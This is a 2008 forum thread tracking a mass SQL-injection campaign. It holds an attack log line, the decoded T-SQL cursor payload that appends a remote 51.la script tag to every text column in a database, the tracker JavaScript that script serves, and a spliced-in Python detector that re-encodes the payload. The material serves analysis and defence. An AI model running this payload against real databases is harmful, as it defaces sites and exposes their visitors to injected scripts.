Author Topic: SQL Injected jscript sites  (Read 72965 times)

July 08, 2008, 04:27:17 pm
Reply #61

YanceySlide


July 08, 2008, 04:34:14 pm
Reply #62

YanceySlide


July 08, 2008, 09:05:59 pm
Reply #63

JohnC



July 09, 2008, 05:22:38 pm
Reply #65

YanceySlide


July 11, 2008, 03:26:16 pm
Reply #66

JohnC


July 14, 2008, 02:27:48 pm
Reply #67

YanceySlide

Only one new one (for now):
www.gitporg.com

July 14, 2008, 02:53:12 pm
Reply #68

YanceySlide


July 14, 2008, 07:41:24 pm
Reply #69

YanceySlide


July 15, 2008, 12:25:17 pm
Reply #70

YanceySlide


July 15, 2008, 07:36:31 pm
Reply #71

JohnC


July 16, 2008, 03:31:13 pm
Reply #72

spamislame

I noticed a couple of things about these attacks now that a domain I control was recently hit with a variety of exploits (fortunately it's secure against all of them).

- They only try one type of exploit at a time, and they only attempt it once.
- They use a different IP address for each attempt that they make, indicating that it's a distributed attack and seemingly automated.

The first attack attempted to exploit HORDE, a web mail client, using an outdated and assumedly unpatched version.

All other attacks (three so far) have focused on unpatched or outdated installs of WordPress.

The IPs appear to all be home internet accounts using cable or DSL connections, indicating that the Storm infection is behind it (previously discussed, I am sure).

FYI, if it helps.

SiL

July 17, 2008, 04:06:01 pm
Reply #73

Orac

Our log entry
Code:
***.***.***.*** - - [17/Jul/2008:08:13:32 +0000] "GET /forums/index.php?act=attach&type=post&id=125;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(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%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 403 1223 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" (malwarebytes.org) "-"
Decoded
Code:
DECLARE @S CHAR(4000);
SET @S=CAST (
DECLARE @T varchar(255),@C varchar(4000)
DECLARE Table_Cursor CURSOR FOR
  select a.name,b.name from sysobjects a,syscolumns b
  where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
  exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://js.users.51.la/2016222.js"></script><!--'' where '+@C+' not like ''%"></title><script src="http://js.users.51.la/2016222.js"></script><!--''')
  FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
) AS CHAR(4000));
EXEC(@S);

The link, js.users.51.la/2016222.js, gives us
Code:
document.write ('<a href="http://www.51.la/?2016222" target="_blank"><img alt="&#x35;&#x31;&#x2E;&#x6C;&#x61;&#x20;&#x4E13;&#x4E1A;&#x3001;&#x514D;&#x8D39;&#x3001;&#x5F3A;&#x5065;&#x7684;&#x8BBF;&#x95EE;&#x7EDF;&#x8BA1;" src="http://icon.ajiang.net/icon_0.gif" style="border:none" /></a>\n');
// A Popular Free Statistics Service for 100 000+ Webmasters.
window.onerror=function(){return true};
document.write ('<script>var a6222tf="51la";var a6222pu="";var a6222pf="51la";var a6222su=window.location;var a6222sf=document.referrer;var a6222of="";var a6222op="";var a6222ops=1;var a6222ot=1;var a6222d=new Date();var a6222color="";if (navigator.appName=="Netscape"){a6222color=screen.pixelDepth;} else {a6222color=screen.colorDepth;}<\/script><script>a6222tf=top.document.referrer;<\/script><script>a6222pu =window.parent.location;<\/script><script>a6222pf=window.parent.document.referrer;<\/script><script>a6222ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a6222ops=(a6222ops==null)?1: (parseInt(unescape((a6222ops)[2]))+1);var a6222oe =new Date();a6222oe.setTime(a6222oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a6222ops+ ";path=/;expires="+a6222oe.toGMTString();a6222ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a6222ot==null){a6222ot=1;}else{a6222ot=parseInt(unescape((a6222ot)[2])); a6222ot=(a6222ops==1)?(a6222ot+1):(a6222ot);}a6222oe.setTime(a6222oe.getTime()+365*24*60*60*1000);document.cookie="AJSTAT_ok_times="+a6222ot+";path=/;expires="+a6222oe.toGMTString();<\/script><script>a6222of=a6222sf;if(a6222pf!=="51la"){a6222of=a6222pf;}if(a6222tf!=="51la"){a6222of=a6222tf;}a6222op=a6222pu;try{lainframe}catch(e){a6222op=a6222su;}document.write(\'<img style="width:0px;height:0px" src="http://web.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=20&id=2016222&tpages=\'+a6222ops+\'&ttimes=\'+a6222ot+\'&tzone=\'+(0-a6222d.getTimezoneOffset()/60)+\'&tcolor=\'+a6222color+\'&sSize=\'+screen.width+\',\'+screen.height+\'&referrer=\'+escape(a6222of)+\'&vpage=\'+escape(a6222op)+\'" \/>\');<\/script>');

The link in the above code, www.51.la/?2016222, gives us what looks like an automated registration script
Code:
  <li><a href="reg.asp"></a></li>
  <li><a href="login.asp">¼</a></li>
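An added example (not from the thread or any poster) of how a defender can pull the injected payload out of a request line like the one above: it URL-decodes the request, recognises the DECLARE ... CAST(0x...) ... EXEC pattern, decodes the hex literal, and reports the script URLs and the sysobjects/syscolumns enumeration the cursor performs. The log line and hex literal are constructed here by re-encoding the decoded T-SQL from the post; the NVARCHAR branch (UTF-16LE, as SQL Server stores NCHAR data) goes beyond what this particular log shows.

```python
import re
from urllib.parse import unquote

# Constructed sample: the decoded cursor payload quoted in the post above, re-encoded as hex
# inside CAST(... AS CHAR(4000)) the way the original request line carried it.
INNER_SQL = (
    "DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR "
    "select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' "
    "and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor "
    "FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN "
    "exec('update ['+@T+'] set ['+@C+']=['+@C+']+''\"></title>"
    "<script src=\"http://js.users.51.la/2016222.js\"></script><!--'' where '+@C+' not like "
    "''%\"></title><script src=\"http://js.users.51.la/2016222.js\"></script><!--''')"
    "FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor"
)
HEX_PAYLOAD = "0x" + INNER_SQL.encode("latin-1").hex().upper()
SAMPLE_LOG = (  # constructed Apache combined-log line; client IP from the documentation range
    '198.51.100.7 - - [17/Jul/2008:08:13:32 +0000] "GET /forums/index.php?act=attach&type=post'
    "&id=125;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(" + HEX_PAYLOAD + "%20AS%20CHAR(4000));"
    'EXEC(@S); HTTP/1.1" 403 1223 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"'
)

REQ_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
INJ_RE = re.compile(r"DECLARE\s+@\w+.*EXEC\s*\(", re.I | re.S)
CAST_RE = re.compile(r"CAST\(0x([0-9A-Fa-f]+)\s+AS\s+(N?(?:VAR)?CHAR)", re.I)
SRC_RE = re.compile(r'<script\s+src="([^"]+)"', re.I)


def analyze_request_line(line):
    """Return None for a clean request, else a summary of the injected T-SQL."""
    m = REQ_RE.search(line)
    if not m:
        return None
    target = unquote(m.group(1))  # undo %20 etc., as the web app would before building its query
    if not INJ_RE.search(target):
        return None
    payload = ""
    cast = CAST_RE.search(target)
    if cast:
        raw = bytes.fromhex(cast.group(1))
        # CHAR/VARCHAR carry single-byte text; the NCHAR/NVARCHAR variant is UTF-16LE in SQL Server
        codec = "utf-16-le" if cast.group(2).upper().startswith("N") else "latin-1"
        payload = raw.decode(codec, errors="replace")
    return {
        "decoded_sql": payload,
        "scripts": sorted(set(SRC_RE.findall(payload))),  # URLs the UPDATE would splice into every text column
        "enumerates_schema": bool(re.search(r"\bsys(objects|columns)\b", payload, re.I)),
    }


if __name__ == "__main__":
    print(analyze_request_line(SAMPLE_LOG))
```

Run over real access logs, the `scripts` list is the indicator worth alerting on, and any 200 response to such a request (rather than the 403 above) is the case to investigate.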

July 17, 2008, 04:22:47 pm
Reply #74

YanceySlide
